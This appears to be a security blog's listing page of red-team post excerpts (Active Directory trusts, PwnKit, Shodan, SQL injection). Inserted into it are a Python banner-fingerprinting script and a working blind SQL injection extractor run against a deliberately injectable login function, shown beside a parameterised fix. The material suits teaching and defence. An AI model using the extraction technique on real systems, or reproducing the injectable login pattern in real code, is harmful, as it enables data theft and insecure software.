Active Directory: Exploiting Trust Relationships I

Let’s continue with the posts on Red Teaming. After the post on how to exploit misconfigured Certificate Templates, today we will talk about forests, the trust relationships established between different domains, and how to abuse them to pivot and gain access to other domains. Basic Concepts: Let me first define some …

Active Directory: Exploiting Certificate Templates

Today I would like to talk about a vulnerability that I have found frequently in the Red Team exercises I have participated in: the exploitation of misconfigured Active Directory Certificate Templates. Context: First of all, let’s put a bit of context to the scenario we find ourselves in. We assume that we have …

New Linux Priv Esc – PwnKit (CVE-2021-4034)

A memory corruption vulnerability (CVE-2021-4034) in Polkit, a component used in all major Linux distributions and in some Unix-like operating systems, has just appeared and can be easily exploited by unprivileged local users to gain full root privileges. This vulnerability is really interesting given how easy it is to exploit. Moreover, it has been exploitable …

Shodan

Hacking

Shodan is a search engine for finding specific Internet-exposed services such as webcams, SCADA systems, Linksys routers… Its operation is simple but effective: it scans the whole Internet and uses the information returned in device banners to discover the software version, the device model, etc. Shodan is especially useful for investigating IoT devices, since …
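The "banner to product/version" step described above is the core of what Shodan does at scale. The following Python is an added example (not code from the post or from Shodan) that fingerprints a few constructed SSH, HTTP, RTSP and FTP banners the way a scanner would; the sample banners and the regexes are my own assumptions about typical banner formats, and `grab_banner` is only there to show where a live probe would plug in.

```python
import re
import socket

# Constructed sample banners, modelled on what a scanner sees when it connects
# to common ports. They are invented for this example, not real Shodan data.
SAMPLE_BANNERS = {
    "ssh": "SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5\r\n",
    "http": "HTTP/1.1 200 OK\r\nServer: Apache/2.4.41 (Ubuntu)\r\nContent-Type: text/html\r\n\r\n",
    "rtsp": "RTSP/1.0 200 OK\r\nServer: Hipcam RealServer/V1.0\r\n\r\n",
    "ftp": "220 (vsFTPd 3.0.3)\r\n",
    "unknown": "\x00\x01garbage",
}


def fingerprint(banner):
    """Map a raw banner to {'product', 'version'}, or None if unrecognised.

    Each branch encodes one banner convention (assumed typical formats):
    SSH identification string, HTTP/RTSP 'Server' header, FTP 220 greeting.
    """
    # SSH: "SSH-<proto>-<software>_<version> [comment]"
    m = re.match(r"SSH-\d+\.\d+-([A-Za-z]+)_([\w.]+)", banner)
    if m:
        return {"product": m.group(1), "version": m.group(2)}

    # HTTP / RTSP: the Server header is usually "<product>/<version> (os)"
    m = re.search(r"^Server:\s*([^/\r\n]+)/(\S+)", banner, re.MULTILINE)
    if m:
        return {"product": m.group(1).strip(), "version": m.group(2)}

    # FTP greeting: "220 (vsFTPd 3.0.3)" or "220 ProFTPD 1.3.5 Server ..."
    m = re.match(r"220[ -]\(?([A-Za-z]+)\s+(\d[\w.]*)", banner)
    if m:
        return {"product": m.group(1), "version": m.group(2)}

    return None


def inventory(banners):
    """Fingerprint every banner in a {name: banner} dict; unknowns map to None."""
    return {name: fingerprint(b) for name, b in banners.items()}


def find_product(banners, product):
    """Names of all hosts/services running the given product (the 'search' half)."""
    return sorted(
        name for name, fp in inventory(banners).items()
        if fp is not None and fp["product"].lower() == product.lower()
    )


def grab_banner(host, port, timeout=3.0):
    """Live banner grab (not used by the offline samples above).

    Servers such as SSH and FTP talk first; HTTP only answers a request, so a
    minimal HEAD is sent before reading. Decoding is lossy on purpose: banners
    are untrusted bytes and must never be allowed to crash the scanner.
    """
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
        except OSError:
            pass
        try:
            return s.recv(1024).decode("latin-1", "replace")
        except socket.timeout:
            return ""


if __name__ == "__main__":
    for name, fp in inventory(SAMPLE_BANNERS).items():
        print(f"{name:8} -> {fp}")
    print("Apache hosts:", find_product(SAMPLE_BANNERS, "apache"))
```

Note the asymmetry this illustrates: the scanner never authenticates or exploits anything, it only parses what the service volunteers. That is also why trimming or removing version strings from banners (`ServerTokens Prod` in Apache, for example) reduces what Shodan can index about a host, even if it does not make the host any less vulnerable.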

SQL Injection: OAST techniques

Hacking

Today I bring you a very interesting and not very well known type of SQL Injection: a variation of Blind SQL Injection. If you’re still not very familiar with SQL injections, I recommend you visit this post first. You should also take a look at NoSQL injections in non-relational databases. In Blind SQL …
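As an added example (not code from the post), the following Python shows the Blind SQL Injection baseline that the out-of-band (OAST) variant builds on: a login query built by string concatenation, a true/false oracle derived from whether login succeeds, and character-by-character extraction of a password through that oracle. The out-of-band variant the post is about replaces this boolean oracle with a callback from the database server to a listener the tester controls, which an in-process SQLite database cannot make, so this block stays with the boolean form. The schema, the sample users and the `login_*` functions are constructed for the example.

```python
import sqlite3
import string


def make_db():
    """In-memory SQLite database with constructed sample users."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 'S3cret!'), ('bob', 'hunter2')")
    con.commit()
    return con


def login_vulnerable(con, username, password):
    """Deliberately injectable: user input is pasted into the SQL text."""
    sql = (
        f"SELECT 1 FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return con.execute(sql).fetchone() is not None


def login_fixed(con, username, password):
    """Hardened form: parameters are bound, never interpreted as SQL."""
    sql = "SELECT 1 FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone() is not None


def extract_password(oracle, username, max_len=32):
    """Boolean-based blind extraction through a login oracle.

    `oracle(payload)` returns True when the injected condition held. The
    SQL comment `-- ` discards the rest of the original WHERE clause, and
    char() is compared instead of a quoted literal so that the alphabet
    can contain quotes without breaking the injected string.
    Returns None when the injection does not work (no length probe is true).
    """
    length = None
    for n in range(1, max_len + 1):
        if oracle(f"{username}' AND length(password)={n}-- "):
            length = n
            break
    if length is None:
        return None

    alphabet = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, length + 1):
        for c in alphabet:
            probe = f"{username}' AND substr(password,{pos},1)=char({ord(c)})-- "
            if oracle(probe):
                recovered += c
                break
        else:
            recovered += "?"  # character outside the alphabet
    return recovered


if __name__ == "__main__":
    con = make_db()
    leaked = extract_password(lambda u: login_vulnerable(con, u, ""), "admin")
    print("vulnerable login leaked:", leaked)
    print("fixed login leaked:",
          extract_password(lambda u: login_fixed(con, u, ""), "admin"))
```

Each probe costs one request, so a seven-character password over a 94-symbol alphabet takes a few hundred round trips; that query volume is exactly the signature a WAF or rate limiter picks up, which is one reason the out-of-band variant (a single query that makes the database server resolve or fetch an attacker-controlled name) is attractive to a tester.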